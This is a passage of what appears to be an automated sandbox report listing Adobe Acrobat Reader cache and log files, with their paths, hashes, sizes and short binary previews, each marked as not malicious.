                                                                                            SHA-512:7F2E43472EA1AFD0E1D2482E88C6344EC9ED9DFAC1AFFD5E259E007573922740A1F33806D2603D4B01B5702CAB0BADF85F753394AEB487933EEC88C1BECC93A2
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......P...W3......_keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/plugin.js .F\..|1/....."#.D_..CJm.A.A..Eo.......c.-........PJm...0x.x..RD...BB!@5..<..]....A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d449e58cb15daaf1_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):231
                                                                                            Entropy (8bit):5.564877666861383
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mqs6XYOFLvEWdFCi5mhuEtEcG9tz9kULlF4r1:bs6xRkiOt4h97LlF4
                                                                                            MD5:F922BB1D4BB8EED03540A5BD362452B1
                                                                                            SHA1:473B095400B065D1B5585FB1D7FF64D7124D775D
                                                                                            SHA-256:7A95C8E760F11BAC4212D00725865D8D9F325DA1179BD1CC56B33D184A1B91DD
                                                                                            SHA-512:7F9C2DAD8ED32B3259789CBC328426E8E7AECDFDE332463312CC606A691335984F10312B2692DECF51B77A457FE1B65759CA70A4C81B903EDE6BDEB3481C3EF2
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......g...~.I?...._keyhttps://rna-resource.acrobat.com/static/js/plugins/aicuc/js/plugins/rhp/exportpdf-rna-selector.js .~...|1/....."#.D.9.AJm.A.A..Eo...................P...#4..l....5...5..).w.. .h.~..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d88192ac53852604_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):215
                                                                                            Entropy (8bit):5.485212584384195
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mhYOFLvEWd/aFuBJgTlXoAkatT1EN941:WR6pXDkafEN9
                                                                                            MD5:7F465233EE2906DBB621C981B09A82E7
                                                                                            SHA1:B2704C9061A632E2B87364E850785B81E97D1FF8
                                                                                            SHA-256:AD223CA58C9368EF5AFEE1E987138E41A54B6D7AB623EE5BD1B0F299F9ECD6FE
                                                                                            SHA-512:FF2E3F3E8662753B90A54B25ADA9139EA569FF71F03AF8068EA68E0D86CAB5F253F88E2889E323700D17A6117FA9219F9116B538E578CE52609CC6CB9CF99430
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......W....w.m...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-recent-files/js/selector.js ..2..|1/....."#.D.}3CJm.A.A..Eo......../^...........a.f.m.i.o.p..3U5.....^...I.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\de789e80edd740d6_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):208
                                                                                            Entropy (8bit):5.552134773022043
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mR9YOFLvEWd7VIGXOdQQH0kathmBMqVd3G4K41:2DRuRrUkaaB9Vd2
                                                                                            MD5:690D30C3ED98C9B35E58AC99C8D80BFA
                                                                                            SHA1:049F444F80E32D9E4EF63310FA1A3310D2F1DACC
                                                                                            SHA-256:24A1E5B72F97B2C7D83CB4ADED0E326565A40195C42C0A63DE782A8A04DCB0BC
                                                                                            SHA-512:84C7743F93E3F8FFFFE1E3668EA5565CD8222BFF033C0883A334ADA42F92F8672D557255B709B6A6957309D1C79E22B93D51A5AB7974002CE09806B7B359E895
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......P...y.p....._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/plugin.js ..[..|1/....."#.D..'CJm.A.A..Eo.......D............y.$..$.v5j...T...z.]..._S....A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):208
                                                                                            Entropy (8bit):5.596792204851484
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mkqYOFLvEWd8CAd9QTReGatDDuA424r1:+RQaEGaZyr
                                                                                            MD5:D11D6B365277C7C7C37C21BDD5D2C8F7
                                                                                            SHA1:1E15024B578A725A1CEA8A136E74E1E3AA252094
                                                                                            SHA-256:BC5E7226E46CBB976C123A90CA15CC5FB1D6FFAA22CA8C67218A29F5E1151E9D
                                                                                            SHA-512:AB6DAEA6EC2249C6CD5C54D569F7BA293B0F384D4B854776A539095D313988001DB48CDA9E21ED38D2609D6DFE4B3A3D4E30C58D3BACB4D4C07600351993455E
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......P...gT....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/plugin.js .....|1/....."#.D...CJm.A.A..Eo......U.K........#..@..k(v.8g..5.~_....]Pj.*..6.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f4a0d4ca2f3b95da_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):210
                                                                                            Entropy (8bit):5.48762959869972
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lS5Etla8RzYOCGLvHkWBGKuKjXKVRNUp/KPWFvOEjZpXyB9koMktXLg/1Ag2iV:moXXYOFLvEWdENUAutTDatXM/+yC8n1
                                                                                            MD5:A846A030115F30333A8D567AF6DA165D
                                                                                            SHA1:FAAED57DA7998EDDD80E6942519A5E4139832E22
                                                                                            SHA-256:F39EA3581E9C621995AA472D6E9CCCAD594317D398691FB5262CF4A2A6731541
                                                                                            SHA-512:6C0E3C1F3E10BAF739C7FE647EC04A2F2251BD024C3EAAA33D107D787AAFE426B4BDFE7EC6FD48302AA2A24C63A443C1778BD910651053C7787339822ABDC0E6
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......R..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/selector.js .+!..|1/....."#.D!:+BJm.A.A..Eo......rb..........8.../...;.\\o....1..........+..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):221
                                                                                            Entropy (8bit):5.589522008873824
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lFNrs8RzYOCGLvHkWBGKuKjXKeRKVIJ/2kKLuVWpltrjMktP9/tsYWmYk5m1:mQZYOFLvEWdrROk/VQrpXltPHsLmB41
                                                                                            MD5:7515E51563D14626868C4D3DBA6C9851
                                                                                            SHA1:A229687DEA93822B8E899E30A7A8D50342DB5CAB
                                                                                            SHA-256:635398BB2A03429B9B1F562316E1E280443B52BD80FB8D2C58FD459BF73C8FA1
                                                                                            SHA-512:8EBDF83CB81793A7C56FE79A5BD31F6264271A095EDEF3AC20FBF612457EC6737DB5A81DCA98A830FF04BD0911BB2194D2BCC1438D0F1072B44CF6591D6BBCC3
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......]......,...._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/plugin.js ..d..|1/....."#.D...AJm.A.A..Eo......@+,......... ./.ev......N~..6.b.....$.j;:C...A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):210
                                                                                            Entropy (8bit):5.5519216711079356
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mZ/lXYOFLvEWdccAWu/NqekGatYdm9741:qxRc9geQmdu7
                                                                                            MD5:9FB28C9369ACA7028AD8409D52652D62
                                                                                            SHA1:483E56E31B82446863C54F65DBCF07927418AD3F
                                                                                            SHA-256:13EB7910085354DF5B64CE5F5C7651BEBD6E26D37D54A28D40DB5714B7AF357F
                                                                                            SHA-512:4F2FAB4B8939A6B3BF3B42C2F605FE86BFC3ADF8A72583F5799E0779CC965574B4EBC9F6D42DB7BB87DCFBE7D4C31E86A0904350A2035D86A5C6065556169075
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......R...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/selector.js .0%..|1/....."#.D.>.BJm.A.A..Eo.....................U...I.>P...X...x..0U.~;m.x.k.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):204
                                                                                            Entropy (8bit):5.556246948764075
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lUg18RzYOCGLvHkWBGKuKjXKrAUWiKPWFvTe0x1s59koMkt4tEB6shoq+Nem1:mMOYOFLvEWdwAPVu5d1fatoEB6Jn1
                                                                                            MD5:3C1FB5302CFC6C51BFC3B7FAB6629A83
                                                                                            SHA1:2C902403F860C21CE4EFDCE27567C62320D29520
                                                                                            SHA-256:B9616FEDA6105ED3EBDB6C3FDC5BAEB7EC4B64624706E00D19BF6FC7AE9F51B5
                                                                                            SHA-512:295C861D08AD27AC1038417C56A801A8DEDAD13304F50CBA9B71E47486F91C2AC8D5E01748024873442253ED7AE78B84D2F67F00C475C71EA6472B242911F085
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......L....Ey....._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/selector.js .....|1/....."#.Da.+BJm.A.A..Eo......z...............k....F..D..O.n;[.1m.....=..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fdd733564de6fbcb_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):212
                                                                                            Entropy (8bit):5.650379076978515
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:m3PXYOFLvEWdBJvYQIReekat+XAhcsBXIh1:mxRBJQ67am4B
                                                                                            MD5:62D2F77749607E92907F28E408859CBA
                                                                                            SHA1:55F2E6797920494939431B51D5775F200887563F
                                                                                            SHA-256:695934408AB3D501A835C72D6EB40AEC6ED77892197D4780800EC5A85597823F
                                                                                            SHA-512:F5DC5CB0CE1536836F3B7413618BD18BB79BA9CD806159AC4A3C1385DA67C0E4F2DA4DCFC130AED004B7713915AE7AE8D75AF914C86F1AC4ED666D33A20F3CCA
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......T......z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/plugin.js .2z..|1/....."#.Da.>CJm.A.A..Eo......LFI............k..`..N3.... ..d..$[.....{.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):228
                                                                                            Entropy (8bit):5.574997375669393
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:msPYOFLvEWdrROk/RJUQn+XOQatTtlZc3Me/1:3RrROk/s9OP5tz
                                                                                            MD5:B8FE236AC1B8BA5A045EB667D1A72F71
                                                                                            SHA1:5D61A8977831C9D6D37BF764C5EEA955CC1433FD
                                                                                            SHA-256:877EFF0B53413EB3428CB593B78C176E8B040C8E3A010E04F918B36F6BDDB572
                                                                                            SHA-512:D7216F5012E542C7FA121934C4B5A0BBA809633D080124A3C8AAE3CC37EF696CD62D5F2250F0B793D5CAA4708581553334758288F61C18222A7BD3EC34DD14D9
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......d...<.s....._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/plugin.js ..e..|1/....."#.Dq..BJm.A.A..Eo......"V%..............9Q].8O.z....=..:.N.{....N{.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\temp-index
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1080
                                                                                            Entropy (8bit):5.318786048155944
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:3/4+/l/Cb5tkpLuj4M8U9ZTMzjNJUZMi+/l/A02t0WmZAEmLoXCCkGn:3GluUj4M88MS50QEmY3f
                                                                                            MD5:92ED93F401C51D9BC88585BA21F5994C
                                                                                            SHA1:ED06B287020A19A0CCCD0144386FEA0F2B7B9ECA
                                                                                            SHA-256:CF39E93E8AD12C210F63BE63ED922BE68DD7543E24434EFF6B9A52DC77EE2DA4
                                                                                            SHA-512:636B789644A1EE27A810332C8F1F84F6A300860C49F503E027380EC7919578585357615E5539ADDC457F7C36B1CF2CB85662075407A8F1AC81E2D8CA0A36D345
                                                                                            Malicious:false
                                                                                            Preview: 0... .iMoy retne....+........V............*...aG.|1/...........;.y~A...8.|1/..............oB*....|1/............#...(...A_./.............D.4.@...|1/..........[.i..%.....|1/.............k7A...V.|1/..........]...I..O..|1/.........,+..._.#@...|1/.........<...W..J....|1/..........J..j...@...|1/...........6<|...@..|1/...........2q......V.|1/...........P....V..8.|1/.........!...0.o.X..|1/............P[. q@...|1/...........3.......|1/..........v...q..@.(.|1/...........a........|1/..........C..M.....A_./..........o..k.....|1/...........*.....X..|1/.........qi.K.L.9.O..|1/.........K..JM.gb.O..|1/.............o..aG.|1/.........Gy.'.h..aG.|1/.........F..=z;...V.|1/.........:..N.A....V.|1/..........;/.......|1/....................|1/.........A?.2:...j..|1/..............q..X..|1/..........u\]..q.X..|1/.........^.~..z...x.|1/..........+.{..'.X..|1/.........*)....J:....|1/..........@..x.....|1/..........&.S........|1/............MV3......|1/.........+.U.!..V@...|1/.........
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index (copy)
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1080
                                                                                            Entropy (8bit):5.318786048155944
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:3/4+/l/Cb5tkpLuj4M8U9ZTMzjNJUZMi+/l/A02t0WmZAEmLoXCCkGn:3GluUj4M88MS50QEmY3f
                                                                                            MD5:92ED93F401C51D9BC88585BA21F5994C
                                                                                            SHA1:ED06B287020A19A0CCCD0144386FEA0F2B7B9ECA
                                                                                            SHA-256:CF39E93E8AD12C210F63BE63ED922BE68DD7543E24434EFF6B9A52DC77EE2DA4
                                                                                            SHA-512:636B789644A1EE27A810332C8F1F84F6A300860C49F503E027380EC7919578585357615E5539ADDC457F7C36B1CF2CB85662075407A8F1AC81E2D8CA0A36D345
                                                                                            Malicious:false
                                                                                            Preview: 0... .iMoy retne....+........V............*...aG.|1/...........;.y~A...8.|1/..............oB*....|1/............#...(...A_./.............D.4.@...|1/..........[.i..%.....|1/.............k7A...V.|1/..........]...I..O..|1/.........,+..._.#@...|1/.........<...W..J....|1/..........J..j...@...|1/...........6<|...@..|1/...........2q......V.|1/...........P....V..8.|1/.........!...0.o.X..|1/............P[. q@...|1/...........3.......|1/..........v...q..@.(.|1/...........a........|1/..........C..M.....A_./..........o..k.....|1/...........*.....X..|1/.........qi.K.L.9.O..|1/.........K..JM.gb.O..|1/.............o..aG.|1/.........Gy.'.h..aG.|1/.........F..=z;...V.|1/.........:..N.A....V.|1/..........;/.......|1/....................|1/.........A?.2:...j..|1/..............q..X..|1/..........u\]..q.X..|1/.........^.~..z...x.|1/..........+.{..'.X..|1/.........*)....J:....|1/..........@..x.....|1/..........&.S........|1/............MV3......|1/.........+.U.!..V@...|1/.........
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\todelete_05349744be1ad4ad_0_1 (copy)
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):205
                                                                                            Entropy (8bit):5.643412364247602
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lvns8RzYOCGLvHkWBGKuKjXKLNjKLuVL172EvB9koMkt6/t/iTFJrqzOJkvP5y:men9YOFLvEWdM9Q21n9katii7Z+P41
                                                                                            MD5:16C8ACA88FB8879A1D8032F86C5897BD
                                                                                            SHA1:4C4D8E8E1D615D5B1FA3E59BD608AA94818EAA2D
                                                                                            SHA-256:A2D712DB6523CC35C883746D57A1D7AADC6A873091A57B48784908B87AD463EF
                                                                                            SHA-512:7CB9B9C914FAC252074D7F7B55BAB552028887F5BAAE01D0FEDBEAE578E21D7B475F34D58F526AB367E83F8804A559BC0AE87F0FC29F1FC288BCCA17E339CAF4
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js .'~..|1/....."#.D.SXCJm.A.A..Eo........c.............d.{v.^.G...d.W.:...P..k%..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\todelete_0998db3a32ab3f41_0_1 (copy)
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):246
                                                                                            Entropy (8bit):5.574227650269549
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mMyEYOFLvEWdVFLBKFjVFLBKFlQhuLe/fQfatdt/RlUoSjGY1:DyeRVFAFjVFAFX+f33tZlUo6
                                                                                            MD5:3F6543D02E6C6D1B81B7502B5F8F9C12
                                                                                            SHA1:BB0E857F6CAA6BA89574922DEA2D918FB4F9A829
                                                                                            SHA-256:AFB5D87367F69905C04E2EB67F2C7C2C8978E3E6C9BDCA4FF718F3310AE3FA9E
                                                                                            SHA-512:A0E9C5A8939EE738F5F8128FA4882884671D1652461736103AAB2047413F622C6C40D8FAE7C895DAE78254460E9A35C4C1BD5C5CC7329541A8BB782F0B41852E
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......v...n......._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/selector.js .....|1/....."#.DK..BJm.A.A..Eo......q`............hvDO.N.t@.....n.*...... ....A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\todelete_4a0e94571d979b3c_0_1 (copy)
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):177
                                                                                            Entropy (8bit):5.504847142449123
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+l64HXlA8RzYOCGLvHkjXMLOWFvSEltTwvAqMkt3tkd1dn76KohyP5m1:md4HXXYOFLvEjMSWFvzsoQt3GjUdyP41
                                                                                            MD5:46A69AEF0DD9C3E7DA0B3135C3B6F6DE
                                                                                            SHA1:91F9701BC26CCF77BC7B8AC7FAD5DB5078CBBE91
                                                                                            SHA-256:74B975993584F52DD484B565E1B10FE277DD24501D489AD963757EBF8ADB2E36
                                                                                            SHA-512:89ED3ED32EB73EFC9AE0DF8BCEFC94055540FAD77FAB4D8235A7CF2E22ED9B935FD3A8A0E40ACFBF2BA89A7371BBF3284D48C57626E01BC731C4E5A700EDB887
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......1......5...._keyhttps://rna-resource.acrobat.com/plugins.js ..$..|1/....."#.D..3AJm.A.A..Eo.......,...........PU ....t^.....a.k..u.7.M.BW6#}..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\todelete_927a1596c37ebe5e_0_1 (copy)
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):210
                                                                                            Entropy (8bit):5.538713843032575
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lf1UldA8RzYOCGLvHkWBGKuKjXK9QXAdWKfKPWFveathfAdoMktZqFoDb7T2/1:mYilPYOFLvEWd8CAdAu0ehfQat6ong1
                                                                                            MD5:19163C5DBFA4657ECC755242436D5957
                                                                                            SHA1:46D116BF03480508F3281F6B7335E511C350960A
                                                                                            SHA-256:10F3B78B36AAF14B92FB5BFE2524497E5E9F5FE50EC63D4FA1584C552CBE81B7
                                                                                            SHA-512:75CB30388883FBFF2DB397582D733F97AAFF16E19C6636C1FD42BF5F5B18133D983BD67F47488CBCDBF7BCE813326AC47BE6C928007D61B7AF4D0843FFC186A2
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......R....|....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/selector.js .....|1/....."#.DFy.BJm.A.A..Eo................c}.H7M=M..-.....Ix..R.l...}Rl.$q.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\todelete_aba6710fde0876af_0_1 (copy)
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):188
                                                                                            Entropy (8bit):5.572329118833723
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+l8UElLA8RzYOCGLvHkWBGKuKPK7Cv2xlXVk9hMkttLllEBiaQ562HvpMm1:mAElVYOFLvEW1Kpx1O9jttRrx56uvp1
                                                                                            MD5:59BB6F7C29C91DE7B246D01E6A0EED9A
                                                                                            SHA1:8753417C85513B236977CE8BAE0918480B8E5C45
                                                                                            SHA-256:C1AF21948A4877FC6C02B822B5A1B094C2411E41DF24CDBB20286170C8584C57
                                                                                            SHA-512:1DA8A76E2B6A4EC1FB4F31C3359639F8DBB05789CD79F3FC5E5B95C27F62F1072B35296863FF64E79DE66C0DE3E41BC05E2FEEE9F2C95A02BEB25C8798B26672
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......<...)6......_keyhttps://rna-resource.acrobat.com/static/js/rna-main.js .M...|1/....."#.D..tAJm.A.A..Eo.......~..........z?...SwC...^..y.....V..7R-O.....A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\todelete_bba29d2e6197e2f4_0_1 (copy)
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):211
                                                                                            Entropy (8bit):5.535733828085143
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lxCq//6v8RzYOCGLvHkWBGKuKCH6U4LJzWHK7WFvk0qat3+9Mkt0AlnpSKGoS6:msRPYOFLvEWIa7zp7q3itrt8VPu1
                                                                                            MD5:D34964488831106CFC2136E21538F473
                                                                                            SHA1:F918DFAD52091DA9A2E383A6C74BF033E625FEE7
                                                                                            SHA-256:7EDB43D1869951E9FCB6A96A5E8E8BFA3622825021CF2D2B5456508E9DEE9A75
                                                                                            SHA-512:72E4F9A8385F7FCB86DA5B72133BF0D216BFF483A95AE254329F3707118D70C360A016350F8795A57F336D283BCB1813CBBD1FD0A77D8899EC6178FD0D437446
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......S...{.j....._keyhttps://rna-resource.acrobat.com/static/js/libs/require/2.1.15/require.min.js .,(..|1/....."#.D..JAJm.A.A..Eo........L............L...Im.@.........E.nW...IP..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\todelete_febb41df4ea2b63a_0_1 (copy)
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):228
                                                                                            Entropy (8bit):5.574997375669393
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:msPYOFLvEWdrROk/RJUQn+XOQatTtlZc3Me/1:3RrROk/s9OP5tz
                                                                                            MD5:B8FE236AC1B8BA5A045EB667D1A72F71
                                                                                            SHA1:5D61A8977831C9D6D37BF764C5EEA955CC1433FD
                                                                                            SHA-256:877EFF0B53413EB3428CB593B78C176E8B040C8E3A010E04F918B36F6BDDB572
                                                                                            SHA-512:D7216F5012E542C7FA121934C4B5A0BBA809633D080124A3C8AAE3CC37EF696CD62D5F2250F0B793D5CAA4708581553334758288F61C18222A7BD3EC34DD14D9
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......d...<.s....._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/plugin.js ..e..|1/....."#.Dq..BJm.A.A..Eo......"V%..............9Q].8O.z....=..:.N.{....N{.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):5.196645046328699
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mUptnat+q2PWXp+N2nKuAl9OmbnIFUtHptaZZmwtptJVkwOWXp+N2nKuAl9Ombjd:lpMovaHAahFUtHp8/tpJ5fHAaSJ
                                                                                            MD5:16083A30070FFB22A92F8DD71D08FF45
                                                                                            SHA1:1D8CEA21AC8B8C3C08BD0EB3AC9B30F0F8EDE4DB
                                                                                            SHA-256:22785BE4C986D233CE83C1EB86FE8885CED1D80EF22904E205B0A83FEA341B6F
                                                                                            SHA-512:05AD5EB7A34414503CAE547813BFF50CA792C1895D444402CA63631F41D23AADB9695FA6352B96209969FD88A52EFC6DFF71C21A077140C37142DAC38CCFFCEE
                                                                                            Malicious:false
                                                                                            Preview: 2021/12/11-14:40:58.579 1c18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2021/12/11-14:40:58.580 1c18 Recovering log #3.2021/12/11-14:40:58.581 1c18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):5.196645046328699
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mUptnat+q2PWXp+N2nKuAl9OmbnIFUtHptaZZmwtptJVkwOWXp+N2nKuAl9Ombjd:lpMovaHAahFUtHp8/tpJ5fHAaSJ
                                                                                            MD5:16083A30070FFB22A92F8DD71D08FF45
                                                                                            SHA1:1D8CEA21AC8B8C3C08BD0EB3AC9B30F0F8EDE4DB
                                                                                            SHA-256:22785BE4C986D233CE83C1EB86FE8885CED1D80EF22904E205B0A83FEA341B6F
                                                                                            SHA-512:05AD5EB7A34414503CAE547813BFF50CA792C1895D444402CA63631F41D23AADB9695FA6352B96209969FD88A52EFC6DFF71C21A077140C37142DAC38CCFFCEE
                                                                                            Malicious:false
                                                                                            Preview: 2021/12/11-14:40:58.579 1c18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2021/12/11-14:40:58.580 1c18 Recovering log #3.2021/12/11-14:40:58.581 1c18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
